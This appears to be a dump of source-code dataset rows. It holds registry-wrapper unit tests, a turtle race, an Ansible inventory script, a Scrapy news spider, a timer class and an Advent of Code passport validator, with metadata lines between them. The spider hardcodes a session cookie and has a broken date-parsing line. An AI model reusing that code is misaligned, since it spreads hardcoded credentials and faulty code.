self._test_base_exception(kwargs, errors.FlushKeyError)
class RegCreateKeyEx(TestCaseLocalMachine):
def test_create_existing_subkey(self):
self.assertGreater(interface.RegCreateKeyEx(self.key, 'SOFTWARE'), 0)
def test_access_denied(self):
# TODO Implement test_access_denied
raise unittest.SkipTest
def test_closed_key(self):
self.tearDown()
kwargs = {'key': self.key,
'subKey': 'SOFTWARE'}
self._assert_func_raises(errors.InvalidHandleException, kwargs)
self.setUp()
def test_unicode_subkey_1(self):
self.assertGreater(interface.RegCreateKeyEx(self.key, u'SOFTWARE'), 0)
def test_deep_subkey(self):
self.assertGreater(interface.RegCreateKeyEx(self.key, r'SOFTWARE\Microsoft'), 0)
def test_unicode_subkey_2(self):
self.assertGreater(interface.RegCreateKeyEx(self.key, u'SOFTWARE\\\xe2\x9f\xb2'), 0)
def test_base_exception(self):
kwargs = {'key':-1, 'subKey':'Foo'}
self._test_base_exception(kwargs, errors.CreateKeyFailed)
class RegDeleteKey(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, 'SOFTWARE')
def tearDown(self):
TestCaseLocalMachine.tearDown(self)
def test_delete_nonexisting_subkey(self):
kwargs = {'key': self.key,
'subKey': 'DoesNotExist'}
self._assert_func_raises(KeyError, kwargs)
def test_delete_with_closed_key(self):
kwargs = {'key': self.key,
'subKey': 'DoesNotExist'}
self.tearDown()
self._assert_func_raises(errors.InvalidHandleException, kwargs)
self.setUp()
def test_delete_existing_subkey(self):
key = interface.RegCreateKeyEx(self.key, 'TestDeleteExistingSubkey')
interface.RegCloseKey(key)
kwargs = {'key': self.key,
'subKey': 'TestDeleteExistingSubkey'}
self.assertEqual(None, interface.RegDeleteKey(**kwargs))
def test_delete_None_as_subkey(self):
kwargs = {'key': self.key,
'subKey': None}
self.tearDown()
self._assert_func_raises(errors.InvalidParameterException, kwargs)
self.setUp()
def test_delete_subkey_with_subkeys(self):
key = interface.RegCreateKeyEx(self.key, 'TestDeleteSubkeyWithSubkeys')
interface.RegCloseKey(interface.RegCreateKeyEx(key, 'TestDeleteSubkeyWithSubkeys'))
interface.RegCloseKey(key)
kwargs = {'key': self.key,
'subKey': 'TestDeleteSubkeyWithSubkeys'}
self._assert_func_raises(errors.AccessDeniedException, kwargs)
def test_delete_subkey_with_values(self):
key = interface.RegCreateKeyEx(self.key, u'TestDeleteSubKeyWithValues')
interface.RegSetValueEx(key, 'someValue', 'fooBar')
interface.RegCloseKey(key)
kwargs = {'key': self.key,
'subKey': 'TestDeleteSubKeyWithValues'}
self.assertEqual(None, interface.RegDeleteKey(**kwargs))
def test_delete_existing_subkey_in_unicode(self):
key = interface.RegCreateKeyEx(self.key, u'\xe2\x9f\xb2')
interface.RegCloseKey(key)
kwargs = {'key': self.key,
'subKey': u'\xe2\x9f\xb2'}
self.assertEqual(None, interface.RegDeleteKey(**kwargs))
def test_base_exception(self):
kwargs = {'key':-1, 'subKey': u'fooBar'}
self._test_base_exception(kwargs, errors.DeleteKeyFailed)
class RegDeleteValue(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, 'SOFTWARE')
self.key = interface.RegCreateKeyEx(self.key , 'RegDeleteValue')
def test_invalid_key(self):
kwargs = {'key': 0, }
self._assert_func_raises(errors.InvalidHandleException, kwargs)
def test_invalid_value_name(self):
kwargs = {'key': self.key,
'valueName': 'DoesNotExist'}
self._assert_func_raises(KeyError, kwargs)
def test_valid_value_name(self):
raise unittest.SkipTest
def test_access_denied(self):
raise unittest.SkipTest
def test_null_value_name(self):
kwargs = {'key': self.key,
'valueName': None}
self._assert_func_raises(KeyError, kwargs)
def test_base_exception(self):
kwargs = {'key':-1, 'valueName':'m0she'}
self._test_base_exception(kwargs, errors.DeleteValueFailed)
class RegEnumKeyEx(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, 'SOFTWARE')
def test_index_0(self):
result = interface.RegEnumKeyEx(self.key, 0)
self.assertNotEqual(None, result)
self.assertGreater(len(result), 0)
def test_index_valid_range(self):
for index in range(0, 4):
result = interface.RegEnumKeyEx(self.key, index)
self.assertNotEqual(None, result)
self.assertGreater(len(result), 0)
def test_index_outbound_index(self):
kwargs = {'key': self.key,
'index': 100}
self._assert_func_raises(IndexError, kwargs)
def test_index_bad_index(self):
kwargs = {'key': self.key,
'index':-1}
self._assert_func_raises(IndexError, kwargs)
def test_base_exception(self):
kwargs = {'key':-1, 'index':-1}
self._test_base_exception(kwargs, errors.RegistryBaseException)
class RegEnumValue(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, r'SOFTWARE\Microsoft\Windows NT\CurrentVersion')
def test_index_0(self):
name, data = interface.RegEnumValue(self.key, 0)
self.assertNotEqual(None, data, "'%s' value None, it shouldn't be" % name)
def test_index_1(self):
name, data = interface.RegEnumValue(self.key, 1)
self.assertNotEqual(None, data)
def test_index_outbound_index(self):
kwargs = {'key': self.key,
'index': 1024}
self._assert_func_raises(IndexError, kwargs)
def test_index_bad_index(self):
kwargs = {'key': self.key,
'index':-1}
self._assert_func_raises(IndexError, kwargs)
def _test_for_specific_value(self, expected_name, expected_data, key=None):
index = 0
while True:
name, data = interface.RegEnumValue(key or self.key, index)
if name == expected_name:
self.assertTrue(data, expected_data)
return
index += 1
if key:
interface.RegCloseKey(key)
self.assertTrue(False)
def test_system_root(self):
# TODO add tests that cover more value types
self._test_for_specific_value("SystemRoot", r'C:\WINDOWS')
def test_base_exception(self):
kwargs = {'key':-1, 'index':-1}
self._test_base_exception(kwargs, errors.RegistryBaseException)
class RegQueryValueEx(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, r'SYSTEM\CurrentControlSet\Services\Netlogon')
def test_invalid_key(self):
kwargs = {'key': 0, }
self._assert_func_raises(errors.InvalidHandleException, kwargs)
def test_invalid_value(self):
kwargs = {'key': self.key,
'valueName': 'DoesNotExist'}
self._assert_func_raises(KeyError, kwargs)
def test_access_denied(self):
raise unittest.SkipTest
def test_null_value_name(self):
# TODO add more tests on more value
kwargs = {'key': self.key,
'valueName': None}
self._assert_func_raises(KeyError, kwargs)
def test_string(self):
kwargs = {'key': self.key,
'valueName': 'ObjectName'}
self.assertEqual('LocalSystem', interface.RegQueryValueEx(**kwargs).to_python_object())
def test_dword(self):
kwargs = {'key': self.key,
'valueName': 'start'}
self.assertEqual(3, interface.RegQueryValueEx(**kwargs).to_python_object())
def test_exand_sz(self):
kwargs = {'key': self.key,
'valueName': 'ImagePath'}
self.assertEqual(u'%SystemRoot%\system32\lsass.exe'.lower(),
interface.RegQueryValueEx(**kwargs).to_python_object().lower())
def test_base_exception(self):
kwargs = {'key':-1, 'valueName':'m0she'}
self._test_base_exception(kwargs, errors.RegistryBaseException)
class RegOpenKeyEx(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, r'SOFTWARE\Microsoft\Windows NT\CurrentVersion')
def test_invalid_key(self):
kwargs = {'key': 0,
'subKey': None }
self._assert_func_raises(errors.InvalidHandleException, kwargs)
def test_invalid_subkey(self):
kwargs = {'key': self.key,
'subKey': 'DoesNotExist'}
self._assert_func_raises(KeyError, kwargs)
def test_none_as_subkey(self):
kwargs = {'key': self.key,
'subKey': None}
self.assertGreater(interface.RegOpenKeyEx(**kwargs), 0)
def test_valid_key(self):
kwargs = {'key': self.key,
'subKey': 'Terminal Server'}
self.assertGreater(interface.RegOpenKeyEx(**kwargs), 0)
def test_base_exception(self):
kwargs = {'key':-1, 'subKey':'m0she'}
self._test_base_exception(kwargs, errors.OpenKeyFailed)
class RegQueryInfoKey(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, r'SOFTWARE\Microsoft\Windows NT\CurrentVersion')
def test_invalid_key(self):
kwargs = {'key': 0 }
self._assert_func_raises(errors.InvalidHandleException, kwargs)
def test_valid_key(self):
result = interface.RegQueryInfoKey(self.key)
self.assertGreater(result[0], 0)
def test_base_exception(self):
kwargs = {'key':-1}
self._test_base_exception(kwargs, errors.QueryInfoKeyFailed)
class RegSetValueEx(TestCaseLocalMachine):
def setUp(self):
TestCaseLocalMachine.setUp(self)
self.key = interface.RegCreateKeyEx(self.key, 'SOFTWARE')
self.key = interface.RegCreateKeyEx(self.key , 'RegSetValueEx')
def _test_set_get_value(self, name, data):
kwargs = {'key': self.key,
'valueName': name,
'valueData': data}
self.assertEqual(None, interface.RegSetValueEx(**kwargs))
self.assertEqual(data, interface.RegQueryValueEx(key=self.key, valueName=name).to_python_object())
def test_null_value(self):
kwargs = {'key': self.key,
'valueName': '',
'valueData': 'hi'}
self.assertEqual(None, interface.RegSetValueEx(**kwargs))
def test_dword_small(self):
self._test_set_get_value('dword', 1)
def test_dword_max(self):
self._test_set_get_value('dword_max', 2 ** 32 - 1)
def test_sz(self):
self._test_set_get_value('sz', u'hi')
def test_multi_sz(self):
self._test_set_get_value('multi_sz', [u'hi', u'bye'])
def test_binary(self):
self._test_set_get_value('binary', (5, 5, 5, 5, 5, 5, 5, 5))
def test_base_exception(self):
kwargs = {'key':-1, 'valueName':'m0she', 'valueData':1}
self._test_base_exception(kwargs, errors.RegistryBaseException)
| UTF-8 | Python | false | false | 16,763 | py | 13 | tests.py | 12 | 0.633598 | 0.627871 | 0.000537 | 452 | 36.081858 | 106 |
tdemsoy/phytn | 9,921,374,494,209 | 5a153def1fe71b3b58a6c55415d3a4b2d1c76b0a | 0e40118260fd7f4806390aafa8ced03527a54e01 | /phytnkopek | e28ad5f62ea72578b10026b3a4ae8510b53953e0 | []
| no_license | https://github.com/tdemsoy/phytn | 50175f3b3f274136df6e02c3c69dbdb7d4c23e8a | d3539d00bd7b63bcb541f8aed0e5ccd4c659f88e | refs/heads/master | 2021-09-27T17:06:03.794565 | 2018-11-09T20:24:55 | 2018-11-09T20:24:55 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/bin/python3
from turtle import *
from random import randint
penup()
ivy = Turtle()
ivy.shape('turtle')
ivy.color('green')
ivy.penup()
ivy.goto(-160, 40)
ivy.pendown()
jim = Turtle()
jim.shape('turtle')
jim.color('orange')
jim.penup()
jim.goto(-160, 10)
jim.pendown()
for turn in range(100):
ivy.forward(randint(1,5))
jim.forward(randint(1,5))
| UTF-8 | Python | false | false | 364 | 1 | phytnkopek | 1 | 0.664835 | 0.615385 | 0 | 30 | 11.033333 | 27 |
|
bersace/dotfiles | 3,650,722,221,365 | a71d20cf3231bc6a17c42f0321927e162aa51b32 | f3ac506b164a8aa979785b0efdb4bf8021d3c426 | /bin/inventory | 0324b97d2bde829d11ba52c7ba119107fe4012ea | []
| no_license | https://github.com/bersace/dotfiles | 1d5f419c8e7aaddf905c1c891ec842a8748258f1 | 019ceb838a2d8114a90810403c4929e17842c4ed | refs/heads/master | 2016-09-26T01:39:04.960608 | 2016-09-08T09:05:05 | 2016-09-10T20:56:51 | 41,423,518 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
import base64
import os
import json
import socket
import subprocess
TARGET = os.environ.get('TARGET', 'localhost')
CONNECTION = os.environ.get('CONNECTION', 'local')
SHCMD = os.environ.get('SHCMD', '')
if 'localhost' == TARGET:
TARGET = socket.gethostname()
inventory = {
'all': {
'hosts': [TARGET],
},
'_meta': {
'hostvars': {
TARGET: {
'ansible_connection': CONNECTION,
},
},
},
}
print json.dumps(inventory, indent=4)
| UTF-8 | Python | false | false | 535 | 33 | inventory | 5 | 0.566355 | 0.560748 | 0 | 32 | 15.71875 | 50 |
|
timostrating/ponypicpy | 188,978,565,591 | ae68b2e0e10ce7badc806f6868cd7f990b222616 | 7163271868c14e7fc2fde82b6958a6c2c53ecbbe | /scrapers/nieuws/spiders/meppelercourant.py | bd1320342345fca48f2213993dfc1d185696dcf7 | []
| no_license | https://github.com/timostrating/ponypicpy | 32ea8677d5c741a0d34e8e05b67ef3e8ba5dd8a2 | 14e4427ae3e1bc047f7b747b07eb65201643892d | refs/heads/master | 2020-03-18T11:50:20.706974 | 2018-07-02T14:20:58 | 2018-07-02T14:20:58 | 134,693,941 | 1 | 0 | null | false | 2018-06-27T16:11:32 | 2018-05-24T09:38:10 | 2018-06-27T14:45:39 | 2018-06-27T16:11:32 | 742 | 2 | 0 | 0 | CSS | false | null | import scrapy
from datetime import timedelta, date
import urllib2
class MeppelercourantSpider(scrapy.Spider):
name = "meppelercourant"
start_urls = []
def daterange(self, start_date, end_date):
for n in range(int ((end_date - start_date).days)):
yield start_date + timedelta(n)
def __init__(self):
for i in range(1, 13):
self.start_urls.append('https://www.meppelercourant.nl/zoeken/resultaat?p={0}'.format(i))
def parse(self, response):
for article in response.css('.comp-zoeken-sublist-container > div'):
url = "https://www.meppelercourant.nl" + article.css('a').xpath('@href').extract_first()
yield scrapy.Request(url, callback=self.parse_article)
def parse_article(self, response):
yield {
'naam': 'meppelercourant.nl',
'url': response.url,
'datum': filter(None, response.css('.comp-nieuws-detail-credits ::text').extract_first().split(" "))[3:][:3].replace(",", " "),
'titel': response.css('h1 ::text').extract_first(),
'tekst': (''.join(response.css(".comp-nieuws-detail-text > p ::text").extract())).replace("\t", "").replace("\n", "").replace("\r", "")
}
def make_requests_from_url(self, url):
request = super(MeppelercourantSpider, self).make_requests_from_url(url)
request.cookies['PHPSESSID'] = "56cagigi64jq2afkbk8rcjpki4" # You probably need to change this value, just copy this value from your own coockie
return request | UTF-8 | Python | false | false | 1,556 | py | 89 | meppelercourant.py | 60 | 0.613753 | 0.604113 | 0 | 34 | 44.794118 | 152 |
mrbirl/PiCloud | 4,844,723,155,834 | 269a82e06c48ba131b06bb1e8c34d3cba1e0a5b3 | e8bb08b43628242669dbf97a738b2c54e0ff7063 | /Server App/auth.py | a76df03187b1eac6dce74389ca8a5b264fa16e78 | [
"LicenseRef-scancode-warranty-disclaimer"
]
| no_license | https://github.com/mrbirl/PiCloud | 16e6b422142dd15ee78542b37bae94cd187a8817 | 98a4ab5abaff63d10ec51253af007d910f058329 | refs/heads/master | 2020-12-31T07:32:16.002906 | 2016-04-15T16:24:38 | 2016-04-15T16:24:38 | 56,333,945 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from dropbox import client, session
import webbrowser
# Authorise Dropbox - creates & returns Dropbox client object
def getClient():
APP_KEY = 'theappkey'
APP_SECRET = 'thesecret'
ACCESS_TYPE = 'dropbox'
try:
# See if there is a text file with the tokens already
TOKENS = 'dropbox_token.txt'
token_file = open(TOKENS)
token_key, token_secret = token_file.read().split('|')
token_file.close()
sess = session.DropboxSession(APP_KEY, APP_SECRET, ACCESS_TYPE)
sess.set_token(token_key, token_secret)
except Exception:
# Haven't authorised app already, so:
# Creates a session
sess = session.DropboxSession(APP_KEY, APP_SECRET, ACCESS_TYPE)
# requests a token using the session
request_token = sess.obtain_request_token()
# creates a athorisation-token using our session
url = sess.build_authorize_url(request_token)
# opens it in the browser
webbrowser.open_new_tab(url)
# when we're authorized, request a key-input
print "Please authorize in the browser. After you're done, press enter."
raw_input()
# If we can obtain the access token, we're authenticated.
access_token = sess.obtain_access_token(request_token)
# Write these to a file for future reference...
token_file = open(TOKENS, 'w')
token_file.write("%s|%s" % (access_token.key, access_token.secret))
token_file.close()
# Initalizes the client so that we can do API-calls
client = client.DropboxClient(sess)
return client
| UTF-8 | Python | false | false | 1,659 | py | 22 | auth.py | 21 | 0.629898 | 0.629898 | 0 | 43 | 36.581395 | 80 |
Tarnal12/AoC2020 | 15,487,652,073,622 | 1935b374c3f4482390b91aa80e1fddd3507f4410 | 083c008397f7ba3f67168da8d366e0683a98dda9 | /Day4Soln.py | 9bfddeb21a738a8fb6369167c9d75f30c16a675a | []
| no_license | https://github.com/Tarnal12/AoC2020 | 205544c00531dc87da4db4daf133e6177fa33e9d | 2d6c10df2d8e0c8fd8eff11d990d01e64f5b6653 | refs/heads/master | 2023-02-05T01:32:23.026898 | 2020-12-16T11:25:45 | 2020-12-16T11:25:45 | 318,761,591 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import re
class Passport():
def __init__(self, data: str):
data = data.replace('\n', ' ')
self.data_map = {}
for data_item in data.split(' '):
(data_key, data_value) = data_item.split(':')
self.data_map[data_key] = data_value
#print(f"{data} is valid? {self.is_valid()}")
def is_valid(self):
try:
if int(self.data_map['byr']) < 1920 or int(self.data_map['byr']) > 2002:
return False
if int(self.data_map['iyr']) < 2010 or int(self.data_map['iyr']) > 2020:
return False
if int(self.data_map['eyr']) < 2020 or int(self.data_map['eyr']) > 2030:
return False
height_units = self.data_map['hgt'][-2:]
height_val = int(self.data_map['hgt'][:-2])
if (
height_units not in ('cm', 'in') or
(height_units == 'cm' and (height_val < 150 or height_val > 193)) or
(height_units == 'in' and (height_val < 59 or height_val > 76))
):
return False
hair_color_re = re.compile("^#[0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f][0-9a-f]$")
if not hair_color_re.match(self.data_map['hcl']):
return False
if self.data_map['ecl'] not in ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']:
return False
if len(self.data_map['pid']) != 9 or not self.data_map['pid'].isnumeric():
return False
return (
'byr' in self.data_map and
'iyr' in self.data_map and
'eyr' in self.data_map and
'hgt' in self.data_map and
'hcl' in self.data_map and
'ecl' in self.data_map and
'pid' in self.data_map
)
except Exception as e:
return False
if __name__ == "__main__":
with open("Day4Input.txt", "r") as f:
contents = f.read()
documents = [block for block in contents.split('\n\n')]
valid_count = 0
for document in documents:
passport = Passport(document)
valid_count += passport.is_valid()
print(valid_count)
| UTF-8 | Python | false | false | 2,277 | py | 15 | Day4Soln.py | 15 | 0.475187 | 0.452789 | 0 | 67 | 32.985075 | 93 |
Gastd/motion_ctrl | 15,092,515,085,070 | 0926b1b89d4c64a02a35a980d13ba3a523c2ea35 | 6b20c1fb1b9cbc117f4de21e8a24259d1031100e | /scripts/timer.py | f45e325bbaf11a1b7bcde7199c8649c97f9e2d3a | []
| no_license | https://github.com/Gastd/motion_ctrl | 4e943fe35df0b4551712211d3d0130e611975e22 | 646e4ae933dcc3f658010753aa74f4f00767452f | refs/heads/main | 2023-07-11T08:04:24.722041 | 2021-08-05T02:12:42 | 2021-08-05T02:12:42 | 301,256,131 | 1 | 1 | null | false | 2020-10-08T19:07:24 | 2020-10-05T00:31:23 | 2020-10-05T08:28:34 | 2020-10-08T19:07:23 | 166 | 1 | 1 | 0 | CMake | false | false | from abc import abstractmethod
class Timer:
def __init__(self):
pass
@abstractmethod
def now(self):
pass
class PseudoTimer(Timer):
def now(self):
return 0.0
| UTF-8 | Python | false | false | 200 | py | 27 | timer.py | 7 | 0.595 | 0.585 | 0 | 13 | 14.384615 | 30 |
ncrnkovich/NeutronTransport | 7,361,573,968,545 | ab2a1e377874bc3b8182c4c3ac1f6afdefffe0ea | 267a5422bf5039c18264fea9a9708902c42257e8 | /motion1Dfunction.py | 06c3e22a398679277986d345a50da7e765bd6a6a | []
| no_license | https://github.com/ncrnkovich/NeutronTransport | 39d29866e1e58f575cb724ef1c1b9a3a0a1a35ce | 8ec3bcd34d758ccd148bd39f5148a5870027b07d | refs/heads/main | 2023-06-20T03:22:32.770185 | 2021-07-19T14:50:32 | 2021-07-19T14:50:32 | 371,237,396 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #%%
# nonuniform sweep function
# import libraries
from os import write
import numpy as np
import math as math
import matplotlib.pyplot as plt
from numpy.core.numeric import Inf
import scipy as scipy
from scipy.constants import constants
import scipy.special
# import crossSections
from crossSections import reedsProblem
# from sweepFunctionNonUniform import sweepMotion
def motion1D(a, I, N, Q_f, q):
x = np.linspace(0,a,I)
dx = x[1] - x[0]
u = materialVel(I,dx, a)
# preallocate angular flux vectors and scalar flux and set boundary conditions
psiCenter = np.zeros((N,I))
psiEdge = np.zeros((N,I+1))
phiPrev = np.zeros(I)
psiEdgePrev = np.zeros((N,I+1))
psiCenterPrev = np.zeros((N,I))
# fill cross section and source vectors
sig_t, sig_s, sig_f, S = fill(I,dx)
mu, w = scipy.special.roots_legendre(N)
# w = w/np.sum(w)
boundary = np.zeros(N)
Q = np.zeros(I) + 0.5*sig_s*phiPrev[0] + Q_f
error = 10
errTol = 1E-8
it = 1
while error > errTol:
psiCenter, psiEdge = sweepMotion(psiCenter, psiEdge, psiCenterPrev, psiEdgePrev, u, q, a, sig_t, Q, boundary)
phi = phiSolver(psiCenter, w)
Q = 0.5*sig_s*phi + Q_f # iterate on source
error = np.linalg.norm(phiPrev - phi)
# copy values for next iteration
phiPrev = phi.copy()
# print("Iteration = ", it, "error = ", error)
it += 1
if error > 100000:
break
# elif it > 1:
# break
return phi, psiCenter
def sweepMotion(psiCenter, psiEdge, psiCenterPrev, psiEdgePrev, u, q, a, sig_t, Q, boundary):
## a = total thickness
## I = number of points
## N = number of discrete ordinates
## sig_t = total cross section vector
## sig_s = scattering cross section vector
## S = source
## psiEdgeL == left boundary condition
## psiEdgeR == right boundary condition
# set up grid
N, I = psiCenter.shape
x = np.linspace(0, a, I)
delta = x[1] - x[0]
# P_N Quadrature for order N w_n normalized to 1
mu_n, w_n = scipy.special.roots_legendre(N)
w_n = w_n/np.sum(w_n)
for n in range(mu_n.size):
mu = mu_n[n]
# q = np.abs(mu*v - u) # uniform neutron vel relative to uniform material vel
if mu + u[0]/q[0] > 0:
i = 0
psiEdge[n,0] = boundary[n]
psiEdge[n,-1] = boundary[(N-1)-n]
while i < I:
if mu + u[i+1]/q[i+1] > 0:
psiCenter[n,i] = (delta*Q[i] + psiEdge[n,i]*(2*mu + u[i+1]/q[i+1] + u[i]/q[i]))/(2*mu + delta*sig_t[i] + 2*u[i+1]/q[i+1])
psiEdge[n,i+1] = 2.0*psiCenter[n,i] - psiEdge[n,i]
i += 1
elif mu + u[i+1]/q[i+1] < 0: # change in direction has occurred
j = i
while mu + u[j+1]/q[j+1] < 0: # when false, j is center of B-type cell (no in-flux)
j += 1
if j == I- 1:
break
if j == I - 1:
psiCenter[n,j] = (delta*Q[j] - psiEdge[n,j+1]*(2*mu + u[j+1]/q[j+1] + u[j]/q[j]))/(-2*mu + delta*sig_t[j] - 2*u[j]/q[j])
psiEdge[n,j] = 2.0*psiCenter[n,j] - psiEdge[n,j+1]
else:
psiCenter[n,j] = Q[j]/sig_t[j]
psiEdge[n,j] = psiCenter[n,j]
psiEdge[n,j+1] = psiCenter[n,j]
for k in range(j-1, i, -1):
psiCenter[n,k] = (delta*Q[k] - psiEdge[n,k+1]*(2*mu + u[k+1]/q[k+1] + u[k]/q[k]))/(-2*mu + delta*sig_t[k] - 2*u[k]/q[k])
psiEdge[n,k] = 2.0*psiCenter[n,k] - psiEdge[n,k+1]
psiCenter[n,i] = 0.5*(psiEdge[n,i] + psiEdge[n, i+1])
i = j + 1
else:
print("error: mu*v + u[i] = 0")
elif mu + u[-1]/q[-1] < 0:
i = I - 1
psiEdge[n,-1] = boundary[n]
psiEdge[n, 0] = boundary[(N-1)-n]
while i > -1:
# print("n = ", n, mu*v + u[i])
if mu + u[i]/q[i] < 0:
psiCenter[n,i] = (delta*Q[i] - psiEdge[n,i+1]*(2*mu + u[i+1]/q[i+1] + u[i]/q[i]))/(-2*mu + delta*sig_t[i] - 2*u[i]/q[i])
psiEdge[n,i] = 2.0*psiCenter[n,i] - psiEdge[n,i+1]
i -= 1
elif mu + u[i]/q[i] > 0:
j = i
while mu + u[j]/q[j] > 0:
j -= 1
if j == 0:
psiCenter[n,j] = (delta*Q[j] + psiEdge[n,j]*(2*mu + u[j+1]/q[j+1] + u[j]/q[j]))/(2*mu + delta*sig_t[j] + 2*u[j+1]/q[j+1])
psiEdge[n,j+1] = 2.0*psiCenter[n,j] - psiEdge[n,j]
else:
psiCenter[n,j] = Q[j]/sig_t[j]
psiEdge[n,j+1] = psiCenter[n,j] # flux out of cells with no in-flux is isotropic
psiEdge[n,j] = psiCenter[n,j]
for k in range(j+1, i, 1):
psiCenter[n,k] = (delta*Q[k] + psiEdge[n,k]*(2*mu + u[k+1]/q[k+1] + u[k]/q[k]))/(2*mu + delta*sig_t[k] + 2*u[k+1]/q[k+1])
psiEdge[n,k+1] = 2.0*psiCenter[n,k] - psiEdge[n,k]
psiCenter[n,i] = 0.5*(psiEdge[n,i] + psiEdge[n, i+1])
i = j - 1
else:
print("error: cant start sweep from left or right. mu = %.2f"%(mu), "mu + u/q = %.3f"%(mu + u[0]/q[0]), "mu + u[I]/q[I] = %.3f"%(mu + u[-1]/q[-1]))
return psiCenter, psiEdge
def phiSolver(psi, w):
N, I = psi.shape
phi = np.zeros((I))
for n in range(N):
phi += w[n]*psi[n,:]
return phi
def fill(I,dx):
# place to write any code to fill cross sections/external source vectors
sig_t = np.zeros(I) # total cross section
sig_s = np.zeros(I) # scattering cross section
sig_f = np.zeros(I)
S = np.zeros(I)
# Pu - 239
# sig_t += 0.32640
# sig_s += 0.225216
# sig_f += 0.081600
# Ur-235
sig_t += 0.32640
sig_s += 0.248064
sig_f += 0.065280
# U - D20
# sig_t += 0.54628
# sig_s += 0.464338
# sig_f += 0.054628
S += 0
Fes = 0.23209488
Fet = 0.23256
U235f = 0.06922744
U235s = 0.328042
U235t = 0.407407
Nas = 0.086368032
Nat = 0.086368032
# multimaterial problem
# for i in range(sig_t.size):
# xpos = dx*(i-0.5)
# if xpos < 0.317337461:
# sig_s[i] = Fes
# sig_t[i] = Fet
# sig_f[i] = 0
# elif xpos < 5.437057544:
# sig_s[i] = U235s
# sig_t[i] = U235t
# sig_f[i] = U235f
# elif xpos < 5.754395005:
# sig_s[i] = Fes
# sig_t[i] = Fet
# sig_f[i] = 0
# else:
# sig_s[i] = Nas
# sig_t[i] = Nat
# sig_f[i] = 0
return sig_t, sig_s, sig_f, S
def materialVel(I,dx, a):
u = np.zeros(I+1)
u += 0.95
# for i in range(u.size):
# xpos = dx*(i-0.5)
# if xpos/a > 0.5:
# u[i] = -0.3
# else:
# u[i] = 0.3
# for i in range(u.size):
# xpos = dx*(i - 0.5)
# if xpos > 4 and xpos < 6:
# u[i] = -30
# else:
# u[i] = 10
# for i in range(u.size):
# xpos = dx*(i- 0.5)
# if xpos/a > 0.75:
# u[i] = 0.3
# elif xpos/a < 0.25:
# u[i] = 0.3
# else:
# u[i] = -0.3
return u
# random constants
# Mass of neutron: 1.675E-27 kg
# 1 eV neutron => 13.83 km/s = 13.83E5 cm/s
# 1 MeV neutron => 13830 km/s
# 1 eV = 1.602E-19 J
# a = 2*1.853722
# a = 2*2.256751
a = 2*2.872934
# a = 2*10.371065
# a = 7.757166007
I = 300
N = 10
q = np.zeros(I+1) + 1
nu = 2.7
x = np.linspace(0, a, I)
dx = x[1] - x[0]
sig_t, sig_s, sig_f, S = fill(I,dx)
phi0 = np.zeros(I) + 3
phi0 = phi0/np.linalg.norm(phi0) # do whatever to normalize phi0 to 1
k = 0.8
kprev = 0
Q_f = nu*0.5*sig_f*phi0
errTol = 1E-8
error = 10
it = 1
while error > errTol:
phi, psi = motion1D(a, I, N, Q_f, q)
k = np.linalg.norm(phi)
phi = phi/k
Q_f = 0.5*nu*sig_f*phi
error = np.linalg.norm(k - kprev)
kprev = k.copy()
print("k iteration = ", it, "k = %0.7f"%(k))
it += 1
plt.plot(x,phi)
#%% | UTF-8 | Python | false | false | 8,544 | py | 13 | motion1Dfunction.py | 11 | 0.459621 | 0.405431 | 0 | 283 | 29.194346 | 159 |
HuyaneMatsu/hata | 17,454,747,102,724 | 9dacd81806f3ada278b8f5cd51cd42eaf0fa7a40 | df7f13ec34591fe1ce2d9aeebd5fd183e012711a | /hata/discord/sticker/sticker_pack/tests/test__parse_banner_id.py | e2a1a34306a8b3bba09ac2800be8fc42a0a587d7 | [
"LicenseRef-scancode-warranty-disclaimer"
]
| permissive | https://github.com/HuyaneMatsu/hata | 63e2f6a2d7a7539fd8f18498852d9d3fe5c41d2e | 53f24fdb38459dc5a4fd04f11bdbfee8295b76a4 | refs/heads/master | 2023-08-20T15:58:09.343044 | 2023-08-20T13:09:03 | 2023-08-20T13:09:03 | 163,677,173 | 3 | 3 | Apache-2.0 | false | 2019-12-18T03:46:12 | 2018-12-31T14:59:47 | 2019-12-14T22:03:20 | 2019-12-18T03:46:11 | 2,362 | 2 | 1 | 0 | Python | false | false | import vampytest
from ..fields import parse_banner_id
def test__parse_banner_id():
"""
Tests whether ``parse_banner_id`` works as intended.
"""
banner_id = 202301050003
for input_data, expected_output in (
({}, 0),
({'banner_asset_id': None}, 0),
({'banner_asset_id': str(banner_id)}, banner_id),
):
output = parse_banner_id(input_data)
vampytest.assert_eq(output, expected_output)
| UTF-8 | Python | false | false | 454 | py | 2,953 | test__parse_banner_id.py | 2,919 | 0.590308 | 0.559471 | 0 | 18 | 24.222222 | 57 |
abdallawi/PythonBasic | 3,444,563,780,552 | 607c8c78aa052df12d97f00921084a218295ef0e | 8eb2bf527539608070c5ff783a1e370f8e69bb6b | /data-structures/list/Functions/ZipFunction.py | e6b2a3ec56dcdb4623eb90489f9101a2e8652485 | []
